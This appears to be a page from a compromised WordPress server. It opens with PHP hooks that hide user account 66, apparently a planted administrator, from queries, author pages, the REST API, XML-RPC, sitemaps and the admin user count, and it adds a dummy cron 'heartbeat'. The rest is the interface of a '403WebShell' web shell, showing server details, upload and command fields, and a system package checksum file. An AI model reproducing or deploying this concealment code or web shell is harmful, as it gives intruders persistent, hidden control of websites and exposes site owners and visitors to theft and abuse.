add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/libc-bin.md5sums
caddb06108f033cfa4ce1abef463a641  usr/bin/getconf
389d07f4f079baece1bad8075792a5e6  usr/bin/getent
a0c77585ca2b897eb5a797ca0b255317  usr/bin/iconv
f2528cc7c91b3d27b5f8d82f20aea068  usr/bin/ldd
ee0fe174e7a03773fba9c7bebfc5e7d8  usr/bin/locale
ea035340b12fc1161d9673468a412dd6  usr/bin/localedef
9e1b1f81dc2a801d967915cf6375b7ca  usr/bin/pldd
c76750337ea4dce5a66d59d60c1cfa0a  usr/bin/tzselect
96a44cf07926e64b0471a9af53d4cb21  usr/bin/zdump
4e8692c58483f4647db488b0005e01d1  usr/lib/locale/C.utf8/LC_ADDRESS
a6a4082f562e25b34f52e1659340c7f3  usr/lib/locale/C.utf8/LC_COLLATE
d62f8ca2cdffeca8edb19a3578f3124c  usr/lib/locale/C.utf8/LC_CTYPE
32dfbe5f23e7a06c0156866339e863d3  usr/lib/locale/C.utf8/LC_IDENTIFICATION
e3c1e6b90e6b6a2eb6119802deb76010  usr/lib/locale/C.utf8/LC_MEASUREMENT
51b38968a8ee95ced726075cead11267  usr/lib/locale/C.utf8/LC_MESSAGES/SYS_LC_MESSAGES
1f0484ef96ae1ad0dca4d21f7b6b5bf9  usr/lib/locale/C.utf8/LC_MONETARY
bba91012f78b2190b2b0f0a1731e4cbe  usr/lib/locale/C.utf8/LC_NAME
b5b5e4c522669b714b5a38aecd454704  usr/lib/locale/C.utf8/LC_NUMERIC
5cf51ae8279119ff4c1a67b81b5a6cdf  usr/lib/locale/C.utf8/LC_PAPER
0553c1e77396c436076404a9ffc751ea  usr/lib/locale/C.utf8/LC_TELEPHONE
4f81fd69f48265ab40c8f2a4936300f1  usr/lib/locale/C.utf8/LC_TIME
e84fb5b748fcdc9f755a0506aa60052a  usr/sbin/iconvconfig
85e9e2c4a9c0a7af309c906516aa4548  usr/sbin/ldconfig
cd6aa3d79ddcd1902d663c0ca157b486  usr/sbin/ldconfig.real
6817cd583b0ceb2c0482e73f6d495e4c  usr/sbin/zic
86b2eaa030ceefc59ea39579ec51120d  usr/share/doc/libc-bin/copyright
5e81a875064719ea46f9c300d89bd6fd  usr/share/libc-bin/nsswitch.conf
c006804f13c03f3538c667a4a28a5cde  usr/share/lintian/overrides/libc-bin
91de6230b7ea05cbbe47fe71c658bf56  usr/share/man/man1/getconf.1.gz
8959f2ca99af5b7c5ee527fd90ed533a  usr/share/man/man1/tzselect.1.gz

Youez - 2016 - github.com/yon3zu
LinuXploit